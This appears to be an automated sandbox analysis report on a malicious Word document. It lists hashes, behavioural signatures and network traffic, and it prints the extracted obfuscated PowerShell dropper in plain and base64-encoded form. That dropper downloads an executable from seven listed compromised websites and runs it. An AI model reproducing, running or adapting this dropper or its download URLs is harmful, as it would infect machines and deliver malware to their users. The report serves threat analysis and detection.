0ed1adf222903a5b3335427d554d4a74c05a27cfd1a438788c04f3b3d720c002

Analysis

max time kernel
136s
max time network
125s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
25/05/2024, 09:03 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

71798c1415bd2c656552ec32c9835538_JaffaCakes118.doc
Size

187KB
MD5

71798c1415bd2c656552ec32c9835538
SHA1

51702d9597e77b881c90467455c6479d6a8b7774
SHA256

0ed1adf222903a5b3335427d554d4a74c05a27cfd1a438788c04f3b3d720c002
SHA512

fcaaeaa1556acb2d5181f9ea0706b0d65240f3d118ca5c81cdb22361b908571aae7b9e9164ef730feaa9c97729c5e692973639e2bc9273a410f5d3329b4cd64f
SSDEEP

1536:RGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xilATmd8YkYeT/EA8sap8cjufajnG:vrfrzOH98ipgEh5JYR

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

1
$C2vaij5=(('P'+'cu')+'u'+('t'+'ru'));.('new-'+'it'+'em') $env:UsERpRoFILE\HY3yt3i\S8K49um\ -itemtype diRectORy;[Net.ServicePointManager]::"S`eCU`RIt`YPro`TocoL" = (('t'+'ls')+('12, t'+'ls')+('1'+'1,')+(' t'+'l')+'s');$Skyq7hm = ('X2'+('8'+'z03')+'1d');$Ythxbrf=(('O'+'ne')+('w'+'m9')+'b');$Wdaid86=$env:userprofile+((('w'+'vO')+('Hy3'+'yt')+('3i'+'wv')+('O'+'S8')+('k4'+'9')+('um'+'w')+'vO')."RepLa`Ce"(('w'+'vO'),[strIng][chaR]92))+$Skyq7hm+(('.e'+'x')+'e');$Nbqiyti=('T'+('8'+'hyxg')+'m');$Wt0reis=&('new-'+'o'+'bj'+'ect') neT.wEbcLieNt;$Eqqj5h9=(('ht'+'t')+'p:'+('//d'+'ty')+('l.shop/w'+'p-'+'conten'+'t/W68')+('Nx'+'/*htt')+'p'+'s'+('://s'+'tar'+'-')+'s'+('p'+'eed.'+'vi')+'p'+'/'+('wp'+'-')+('a'+'d'+'min/U'+'2'+'jRIg/')+('*h'+'t')+'tp'+('s:'+'//')+'c'+('shu'+'b1')+('23'+'.cn/'+'wp-')+'a'+('dmin/G'+'a'+'js')+'/*'+('h'+'tt')+'p'+('s:/'+'/')+('viettell'+'o'+'gisti')+'cs'+('.c'+'o'+'m.v')+'n/'+'w'+('p'+'-'+'content')+('/oS4'+'/')+('*http://co'+'c'+'o')+('ca'+'t.se/')+('w'+'p-')+('a'+'dm')+('in/2'+'O')+'a'+('f'+'/*')+'ht'+('tp://'+'a')+('nd'+'r')+('e'+'si')+('rjan.'+'i')+('r/w'+'p')+'-'+('admin'+'/'+'JSH'+'/*'+'ht')+'t'+('ps'+':/')+'/'+('sptrad'+'e')+('.co'+'m')+'.b'+('r/wp'+'-')+'i'+'n'+'c'+('ludes/'+'iF'+'ZOvL')+'/')."sP`liT"([char]42);$Mek1xwu=(('Kw'+'_e')+'p'+'9u');foreach($Ti8hn1p in $Eqqj5h9){try{$Wt0reis."d`ow`NlOaDf`IlE"($Ti8hn1p, $Wdaid86);$W6p1j7h=(('H5'+'8e')+('jr'+'l'));If ((.('G'+'et-'+'Item') $Wdaid86)."LeN`Gth" -ge 27194) {&('I'+'nvoke-I'+'tem')($Wdaid86);$Cehylh9=('W5'+('cud'+'04'));break;$K433x4w=(('Wq'+'5')+'1'+('p'+'m9'))}}catch{}}$Qel4met=(('M'+'io')+'c'+('f'+'7h'))

URLs

exe.dropper

http://dtyl.shop/wp-content/W68Nx/

exe.dropper

https://star-speed.vip/wp-admin/U2jRIg/

exe.dropper

https://cshub123.cn/wp-admin/Gajs/

exe.dropper

https://viettellogistics.com.vn/wp-content/oS4/

exe.dropper

http://cococat.se/wp-admin/2Oaf/

exe.dropper

http://andresirjan.ir/wp-admin/JSH/

exe.dropper

https://sptrade.com.br/wp-includes/iFZOvL/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3988	1748	powershell.exe	82

Blocklisted process makes network request 6 IoCs

flow	pid	Process
28	3988	powershell.exe
102	3988	powershell.exe
105	3988	powershell.exe
106	3988	powershell.exe
109	3988	powershell.exe
121	3988	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3260	WINWORD.EXE
3260	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3988	powershell.exe
3988	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3988	powershell.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
3260	WINWORD.EXE
3260	WINWORD.EXE
3260	WINWORD.EXE
3260	WINWORD.EXE
3260	WINWORD.EXE
3260	WINWORD.EXE
3260	WINWORD.EXE
3260	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\71798c1415bd2c656552ec32c9835538_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -encod JABDADIAdgBhAGkAagA1AD0AKAAoACcAUAAnACsAJwBjAHUAJwApACsAJwB1ACcAKwAoACcAdAAnACsAJwByAHUAJwApACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AdgA6AFUAcwBFAFIAcABSAG8ARgBJAEwARQBcAEgAWQAzAHkAdAAzAGkAXABTADgASwA0ADkAdQBtAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQBSAGUAYwB0AE8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBDAFUAYABSAEkAdABgAFkAUAByAG8AYABUAG8AYwBvAEwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAnACkAKwAoACcAMQAyACwAIAB0ACcAKwAnAGwAcwAnACkAKwAoACcAMQAnACsAJwAxACwAJwApACsAKAAnACAAdAAnACsAJwBsACcAKQArACcAcwAnACkAOwAkAFMAawB5AHEANwBoAG0AIAA9ACAAKAAnAFgAMgAnACsAKAAnADgAJwArACcAegAwADMAJwApACsAJwAxAGQAJwApADsAJABZAHQAaAB4AGIAcgBmAD0AKAAoACcATwAnACsAJwBuAGUAJwApACsAKAAnAHcAJwArACcAbQA5ACcAKQArACcAYgAnACkAOwAkAFcAZABhAGkAZAA4ADYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACgAJwB3ACcAKwAnAHYATwAnACkAKwAoACcASAB5ADMAJwArACcAeQB0ACcAKQArACgAJwAzAGkAJwArACcAdwB2ACcAKQArACgAJwBPACcAKwAnAFMAOAAnACkAKwAoACcAawA0ACcAKwAnADkAJwApACsAKAAnAHUAbQAnACsAJwB3ACcAKQArACcAdgBPACcAKQAuACIAUgBlAHAATABhAGAAQwBlACIAKAAoACcAdwAnACsAJwB2AE8AJwApACwAWwBzAHQAcgBJAG4AZwBdAFsAYwBoAGEAUgBdADkAMgApACkAKwAkAFMAawB5AHEANwBoAG0AKwAoACgAJwAuAGUAJwArACcAeAAnACkAKwAnAGUAJwApADsAJABOAGIAcQBpAHkAdABpAD0AKAAnAFQAJwArACgAJwA4ACcAKwAnAGgAeQB4AGcAJwApACsAJwBtACcAKQA7ACQAVwB0ADAAcgBlAGkAcwA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAYgBjAEwAaQBlAE4AdAA7ACQARQBxAHEAagA1AGgAOQA9ACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAA6ACcAKwAoACcALwAvAGQAJwArACcAdAB5ACcAKQArACgAJwBsAC4AcwBoAG8AcAAvAHcAJwArACcAcAAtACcAKwAnAGMAbwBuAHQAZQBuACcAKwAnAHQALwBXADYAOAAnACkAKwAoACcATgB4ACcAKwAnAC8AKgBoAHQAdAAnACkAKwAnAHAAJwArACcAcwAnACsAKAAnADoALwAvAHMAJwArACcAdABhAHIAJwArACcALQAnACkAKwAnAHMAJwArACgAJwBwACcAKwAnAGUAZQBkAC4AJwArACcAdgBpACcAKQArACcAcAAnACsAJwAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZAAnACsAJwBtAGkAbgAvAFUAJwArACcAMgAnACsAJwBqAFIASQBnAC8AJwApACsAKAAnACoAaAAnACsAJwB0ACcAKQArACcAdABwACcAKwAoACcAcwA6ACcAKwAnAC8ALwAnACkAKwAnAGMAJwArACgAJwBzAGgAdQAnACsAJwBiADEAJwApACsAKAAnADIAMwAnACsAJwAuAGMAbgAvACcAKwAnAHcAcAAtACcAKQArACcAYQAnACsAKAAnAGQAbQBpAG4ALwBHACcAKwAnAGEAJwArACcAagBzACcAKQArACcALwAqACcAKwAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKwAoACcAcwA6AC8AJwArACcALwAnACkAKwAoACcAdgBpAGUAdAB0AGUAbABsACcAKwAnAG8AJwArACcAZwBpAHMAdABpACcAKQArACcAYwBzACcAKwAoACcALgBjACcAKwAnAG8AJwArACcAbQAuAHYAJwApACsAJwBuAC8AJwArACcAdwAnACsAKAAnAHAAJwArACcALQAnACsAJwBjAG8AbgB0AGUAbgB0ACcAKQArACgAJwAvAG8AUwA0ACcAKwAnAC8AJwApACsAKAAnACoAaAB0AHQAcAA6AC8ALwBjAG8AJwArACcAYwAnACsAJwBvACcAKQArACgAJwBjAGEAJwArACcAdAAuAHMAZQAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAoACcAYQAnACsAJwBkAG0AJwApACsAKAAnAGkAbgAvADIAJwArACcATwAnACkAKwAnAGEAJwArACgAJwBmACcAKwAnAC8AKgAnACkAKwAnAGgAdAAnACsAKAAnAHQAcAA6AC8ALwAnACsAJwBhACcAKQArACgAJwBuAGQAJwArACcAcgAnACkAKwAoACcAZQAnACsAJwBzAGkAJwApACsAKAAnAHIAagBhAG4ALgAnACsAJwBpACcAKQArACgAJwByAC8AdwAnACsAJwBwACcAKQArACcALQAnACsAKAAnAGEAZABtAGkAbgAnACsAJwAvACcAKwAnAEoAUwBIACcAKwAnAC8AKgAnACsAJwBoAHQAJwApACsAJwB0ACcAKwAoACcAcABzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBzAHAAdAByAGEAZAAnACsAJwBlACcAKQArACgAJwAuAGMAbwAnACsAJwBtACcAKQArACcALgBiACcAKwAoACcAcgAvAHcAcAAnACsAJwAtACcAKQArACcAaQAnACsAJwBuACcAKwAnAGMAJwArACgAJwBsAHUAZABlAHMALwAnACsAJwBpAEYAJwArACcAWgBPAHYATAAnACkAKwAnAC8AJwApAC4AIgBzAFAAYABsAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE0AZQBrADEAeAB3AHUAPQAoACgAJwBLAHcAJwArACcAXwBlACcAKQArACcAcAAnACsAJwA5AHUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVABpADgAaABuADEAcAAgAGkAbgAgACQARQBxAHEAagA1AGgAOQApAHsAdAByAHkAewAkAFcAdAAwAHIAZQBpAHMALgAiAGQAYABvAHcAYABOAGwATwBhAEQAZgBgAEkAbABFACIAKAAkAFQAaQA4AGgAbgAxAHAALAAgACQAVwBkAGEAaQBkADgANgApADsAJABXADYAcAAxAGoANwBoAD0AKAAoACcASAA1ACcAKwAnADgAZQAnACkAKwAoACcAagByACcAKwAnAGwAJwApACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVwBkAGEAaQBkADgANgApAC4AIgBMAGUATgBgAEcAdABoACIAIAAtAGcAZQAgADIANwAxADkANAApACAAewAmACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtAEkAJwArACcAdABlAG0AJwApACgAJABXAGQAYQBpAGQAOAA2ACkAOwAkAEMAZQBoAHkAbABoADkAPQAoACcAVwA1ACcAKwAoACcAYwB1AGQAJwArACcAMAA0ACcAKQApADsAYgByAGUAYQBrADsAJABLADQAMwAzAHgANAB3AD0AKAAoACcAVwBxACcAKwAnADUAJwApACsAJwAxACcAKwAoACcAcAAnACsAJwBtADkAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAZQBsADQAbQBlAHQAPQAoACgAJwBNACcAKwAnAGkAbwAnACkAKwAnAGMAJwArACgAJwBmACcAKwAnADcAaAAnACkAKQA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3988

Network

DNS

241.150.49.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.150.49.20.in-addr.arpa

IN PTR

Response
DNS

roaming.officeapps.live.com

WINWORD.EXE

Remote address:

8.8.8.8:53

Request

roaming.officeapps.live.com

IN A

Response

roaming.officeapps.live.com

IN CNAME

prod.roaming1.live.com.akadns.net

prod.roaming1.live.com.akadns.net

IN CNAME

eur.roaming1.live.com.akadns.net

eur.roaming1.live.com.akadns.net

IN CNAME

neu-azsc-000.roaming.officeapps.live.com

neu-azsc-000.roaming.officeapps.live.com

IN CNAME

osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com

osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com

IN A

52.109.76.243
POST

https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

WINWORD.EXE

Remote address:

52.109.76.243:443

Request

POST /rs/RoamingSoapService.svc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
User-Agent: MS-WebServices/1.0
SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
Content-Length: 511
Host: roaming.officeapps.live.com

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
X-OfficeFE: RoamingFE_IN_386
X-OfficeVersion: 16.0.17711.30575
X-OfficeCluster: neu-000.roaming.officeapps.live.com
X-CorrelationId: ebbc2c58-855e-4c22-951d-c6d7117c4adf
X-Powered-By: ASP.NET
Date: Sat, 25 May 2024 09:03:56 GMT
Content-Length: 654
DNS

240.143.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.143.123.92.in-addr.arpa

IN PTR

Response

240.143.123.92.in-addr.arpa

IN PTR

a92-123-143-240deploystaticakamaitechnologiescom
DNS

240.76.109.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.76.109.52.in-addr.arpa

IN PTR

Response
DNS

243.76.109.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

243.76.109.52.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

dtyl.shop

powershell.exe

Remote address:

8.8.8.8:53

Request

dtyl.shop

IN A

Response
DNS

73.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.31.126.40.in-addr.arpa

IN PTR

Response
DNS

star-speed.vip

powershell.exe

Remote address:

8.8.8.8:53

Request

star-speed.vip

IN A

Response
DNS

cshub123.cn

powershell.exe

Remote address:

8.8.8.8:53

Request

cshub123.cn

IN A

Response

cshub123.cn

IN A

216.152.233.103
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

204.79.197.237

dual-a-0034.a-msedge.net

IN A

13.107.21.237
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55 HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=04589EF10F676972005D8A7B0E8768B7; domain=.bing.com; expires=Thu, 19-Jun-2025 09:03:58 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9FE6280A0B7B4D5F8209A4BE6B276662 Ref B: LON04EDGE1021 Ref C: 2024-05-25T09:03:58Z
date: Sat, 25 May 2024 09:03:58 GMT
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55 HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=04589EF10F676972005D8A7B0E8768B7; _EDGE_S=SID=264D58218138605D3A2F4CAB80706195

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=uDS9cTTUKAGwPKlM7vyA-sxMR_CxASjgG6JIS-HjIPk; domain=.bing.com; expires=Thu, 19-Jun-2025 09:03:59 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E4215425B6B947EBA10CA8627B131BEA Ref B: LON04EDGE1021 Ref C: 2024-05-25T09:03:59Z
date: Sat, 25 May 2024 09:03:58 GMT
GET

https://www.bing.com/aes/c.gif?RG=6e7988d151f34ab5bb010a5e9231d576&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T135156Z&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189

Remote address:

23.62.61.194:443

Request

GET /aes/c.gif?RG=6e7988d151f34ab5bb010a5e9231d576&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T135156Z&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=04589EF10F676972005D8A7B0E8768B7

Response

HTTP/2.0 200

cache-control: private,no-store
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 34CA4CB248D64E92A9CC695BE0A761DE Ref B: BRU30EDGE0913 Ref C: 2024-05-25T09:03:59Z
content-length: 0
date: Sat, 25 May 2024 09:03:59 GMT
set-cookie: _EDGE_S=SID=264D58218138605D3A2F4CAB80706195; path=/; httponly; domain=bing.com
set-cookie: MUIDB=04589EF10F676972005D8A7B0E8768B7; path=/; httponly; expires=Thu, 19-Jun-2025 09:03:59 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.be3d3e17.1716627839.1cc1226c
DNS

237.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

237.197.79.204.in-addr.arpa

IN PTR

Response
DNS

194.61.62.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.61.62.23.in-addr.arpa

IN PTR

Response

194.61.62.23.in-addr.arpa

IN PTR

a23-62-61-194deploystaticakamaitechnologiescom
GET

https://www.bing.com/th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

Remote address:

23.62.61.194:443

Request

GET /th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
host: www.bing.com
accept: */*
cookie: MUID=04589EF10F676972005D8A7B0E8768B7; _EDGE_S=SID=264D58218138605D3A2F4CAB80706195; MSPTC=uDS9cTTUKAGwPKlM7vyA-sxMR_CxASjgG6JIS-HjIPk; MUIDB=04589EF10F676972005D8A7B0E8768B7
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 999
date: Sat, 25 May 2024 09:04:01 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.be3d3e17.1716627841.1cc1289f
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
DNS

94.65.42.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

94.65.42.20.in-addr.arpa

IN PTR

Response
DNS

183.142.211.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.142.211.20.in-addr.arpa

IN PTR

Response
DNS

metadata.templates.cdn.office.net

WINWORD.EXE

Remote address:

8.8.8.8:53

Request

metadata.templates.cdn.office.net

IN A

Response

metadata.templates.cdn.office.net

IN CNAME

templatesmetadata.office.net

templatesmetadata.office.net

IN CNAME

templatesmetadata.office.net.edgekey.net

templatesmetadata.office.net.edgekey.net

IN CNAME

e26769.dscb.akamaiedge.net

e26769.dscb.akamaiedge.net

IN A

23.62.61.162

e26769.dscb.akamaiedge.net

IN A

23.62.61.184
GET

https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

WINWORD.EXE

Remote address:

23.62.61.162:443

Request

GET /client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: metadata.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Type: text/xml
Server: Kestrel
Content-Encoding: gzip
Content-Length: 1264
Cache-Control: max-age=186735
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Vary: Accept-Encoding
DNS

binaries.templates.cdn.office.net

WINWORD.EXE

Remote address:

8.8.8.8:53

Request

binaries.templates.cdn.office.net

IN A

Response

binaries.templates.cdn.office.net

IN CNAME

binaries.templates.cdn.office.net.edgesuite.net

binaries.templates.cdn.office.net.edgesuite.net

IN CNAME

a1847.dscg2.akamai.net

a1847.dscg2.akamai.net

IN A

2.17.251.23

a1847.dscg2.akamai.net

IN A

2.17.251.32
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp01840907.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
